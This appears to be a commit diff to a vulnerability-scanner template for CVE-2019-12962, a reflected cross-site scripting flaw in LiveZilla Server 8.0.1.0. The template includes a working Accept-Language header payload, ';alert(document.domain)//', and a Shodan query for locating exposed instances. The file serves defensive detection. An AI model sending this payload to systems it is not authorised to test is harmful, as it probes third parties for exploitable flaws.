Update CVE-2019-12962.yaml

patch-1
Prince Chaddha 2022-05-09 12:41:38 +05:30 committed by GitHub
parent a7a30a3ddc
commit 4798c1a14c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 10 deletions

View File

@ -1,33 +1,38 @@
id: CVE-2019-12962
info:
name: LiveZilla Server 8.0.1.0 XSS
name: LiveZilla Server 8.0.1.0 - Cross Site Scripting
author: Clment Cruchet
severity: medium
description: LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
reference: https://www.exploit-db.com/exploits/49669
description: |
LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
reference:
- https://www.exploit-db.com/exploits/49669
- https://nvd.nist.gov/vuln/detail/CVE-2019-12962
metadata:
verified-by: dhiyaneshdk
shodan-query: http.html:LiveZilla
tags: cve,cve2019,livezilla,xss
requests:
- method: GET
headers:
Accept-Language: ';alert(document.domain)//
path:
- '{{BaseURL}}/mobile/index.php'
headers:
Accept-Language: ';alert(document.domain)//'
matchers-condition: and
matchers:
- type: word
words:
- "alert(document.domain)//"
part: body
words:
- "var detectedLanguage = ';alert(document.domain)//';"
- type: word
part: header
words:
- "text/html"
part: header
- type: status
status:
- 200